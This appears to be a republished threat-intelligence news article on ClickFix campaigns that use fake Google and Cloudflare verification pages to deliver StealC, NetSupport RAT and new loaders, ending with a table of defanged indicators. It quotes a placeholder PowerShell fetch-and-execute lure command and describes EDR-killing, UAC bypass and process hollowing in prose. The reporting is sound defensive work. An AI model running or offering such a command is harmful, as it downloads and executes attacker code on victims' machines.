GBHackers

Fake Google and Cloudflare Verification Pages Spread StealC, HijackLoader, and NetSupport Malware


Threat actors are currently exploiting sophisticated ClickFix social engineering campaigns that mimic Google and Cloudflare verification systems to distribute several high-impact malware families, including StealC, HijackLoader, NetSupport RAT, and newly identified loaders.

Recent threat intelligence research indicates that these campaigns have been active since late 2025, tricking users into manually executing malicious PowerShell commands. This effectively bypasses traditional security controls, allowing for a complete compromise of targeted systems.

The attack chains typically rely on fake “Verify you’re human” or “Manual Verification Required” pages that resemble Google reCAPTCHA, Google Meet prompts, and Cloudflare security checks.

These pages are hosted across repurposed domains, compromised websites, and Cloudflare Pages (.pages.dev) infrastructure. Victims are instructed to copy and execute commands such as:

```powershellpowershell -c "iex(irm '{IP}:{Port}/{Path}')"

Observed ports in these commands include 6600, 9900, 5506, 7895, 7493, 149, and 8442. Some campaigns also use the IClickFix framework to deliver payloads via clipboard injection dynamically.

“New sign-in with trusted token” ClickFix page (Source: Malwarebytes)

The infection process typically begins with obfuscated or plaintext PowerShell commands embedded in HTML templates, such as CustomCaptcha or the “SECURITY GATEWAY” framework.

This framework includes components such as GatewayRuntime, RemoteVault, and BeaconDispatcher. In certain variants, attackers implement an “approval gate” that allows real-time selection of payloads.

The “fix audio driver” Google Meet ClickFix lure (Source: Malwarebytes)
The “fix audio driver” Google Meet ClickFix lure (Source: Malwarebytes)

Additional lures include fake Google login alerts, QR code generators, and Google Meet “fix audio driver” prompts, with endpoints like /api/driver-clipboard.php returning OS-specific payloads, as reported by Malwarebytes.

Once executed, the PowerShell downloader drops a script named tmpXXXX.tmp.ps1 in the Temp directory. This script creates a directory called C:ProgramDataZooms, downloads second-stage payloads from Cloudflare R2 buckets or attacker-controlled IPs, and in some cases, exfiltrates host data to endpoints such as http://{IP}/dl-callback. The infrastructure commonly includes ASN Dedik Services Limited, Cloudflare R2 storage, and characteristic “hehe” HTTP responses.

Payload delivery is highly modular, distributing malware via MSI installers, ZIP archives, and executable loaders. Observed payload mappings include libEGL.zip, which delivers a trojanized Electron-based Franz application with ResiLoader and StealC, Test.msi which deploys a Deno loader along with a PowerShell stealer, arworks.zip delivering Amatera Stealer, water-night.zip deploying Remus, and Setup.msi or Invintrum_first.msi, which installs NetSupport RAT.

Additional payloads include CastleLoader (traffic1.msi) and a Rust-based stealer (ibrowser.exe), both of which are often deployed via DLL hijacking.

“QR Code” ClickFix lure page (Source: Malwarebytes)
“QR Code” ClickFix lure page (Source: Malwarebytes)

A notable infection chain involves the trojanized Franz app, which downloads a previously undocumented loader called ResiLoader. This loader, implemented as an obfuscated .NET NativeAOT DLL (msys-crypto-3.dll), uses BYOD techniques with the pcdhost.sys driver to disable over 140 AV/EDR processes.

It establishes persistence through the RUN registry key and the directory C:ProgramDataGoogle Update, performs UAC bypass using the ICMLuaUtil COM interface, and ultimately injects the StealC stealer into ServiceModelReg.exe via process hollowing. Communication with command-and-control infrastructure occurs through domains such as completstep[.]com.

The campaigns utilize an extensive infrastructure, including domains such as onegeekworld[.]com, antibotv3[.]com, generator-qrcode[.]online, and multiple .pages.dev subdomains, as well as Cloudflare R2 buckets such as pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev.

Known payload distribution IPs include 151.240.151[.]126, 85.239.149[.]16, 93.152.224[.]29, and 135.181.171[.]40, while command-and-control servers include 146.19.248[.]120 (StealC), popularcard[.]shop (Rust stealer), and xzz[.]proxygrid[.]cc (Amatera). Associated malware hashes include 72907d0ca3258365838626f6a8d993a6 (ResiLoader), 0234E3188F2883A438B3F2BEAB7A78B2 (StealC), and eee416efcb1e33f220cdb4b05496a07a (NetSupport RAT).

This campaign underscores the growing effectiveness of user-assisted execution techniques, in which social engineering replaces exploit-based delivery. By leveraging trusted brands and requiring manual interaction, attackers significantly reduce detection rates while maintaining flexible, multi-payload distribution capabilities.

Ioc

TypeIndicator / ValueNotes
MalwareResiLoader DLLNew .NET NativeAOT loader used to deploy StealC and evade AV/EDR via BYOD driver pcdhost.sys
Hash72907d0ca3258365838626f6a8d993a6ResiLoader DLL sample from ClickFix Google/Cloudflare campaign
MalwareStealCInfo‑stealer delivered via process hollowing into ServiceModelReg.exe
Hash0234E3188F2883A438B3F2BEAB7A78B2StealC payload associated with this campaign
MalwareRemus StealerDistributed via water-night.zip from Cloudflare R2 / IP infrastructure
Hash6a9ac6b3fff7b695dbd4df6ff7f6c516Remus sample hash
MalwareAmatera StealerDelivered via arworks.zip from Zooms folder chain
Hash206ce339febca0c3bcc850f42595fc63Amatera Stealer hash
MalwareNetSupport RATInstalled via Setup.msi / Invintrum_first.msi
Hasheee416efcb1e33f220cdb4b05496a07aNetSupport sample hash
MalwareRust StealerDropped as ibrowser.exe, C2 at popularcard[.]shop
Hashb8d53740024d126cb55f83854335a4abRust stealer hash
Infraonegeekworld[.]com, antibotv3[.]com, centralwildcats[.]com, regdev-google[.]comHost fake Google/Cloudflare ClickFix verification pages
Infra.pages[.]dev (p-floribunds, pg-altirade2, pg-cordivant-m6, g-luminence)Cloudflare Pages used for obfuscated SECURITY GATEWAY lures
Infragenerator-qrcode[.]onlineFake “My QR Generator” ClickFix service demanding PowerShell verification
Infrapub-7080e0c20a0e47ca95a476869c532367.r2[.]dev and other pub-.r2[.]dev bucketsCloudflare R2 buckets used for payload ZIP/MSI hosting
Infracompletstep[.]comLoader C2 used by trojanized Franz/ResiLoader chain
Infra151.240.151[.]126, 85.239.149[.]16, 93.152.224[.]29, 135.181.171[.]40Payload distribution IPs used in powershell iex(irm ‘IP:Port/Path’) patterns
Infra146.19.248[.]120StealC C2 in this infrastructure cluster

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Interact with Cyber Threats in Windows, Linux, macOS VMs to Trigger Full Attack Chain - Analyse Malware & Phishing with ANY RUN



Source link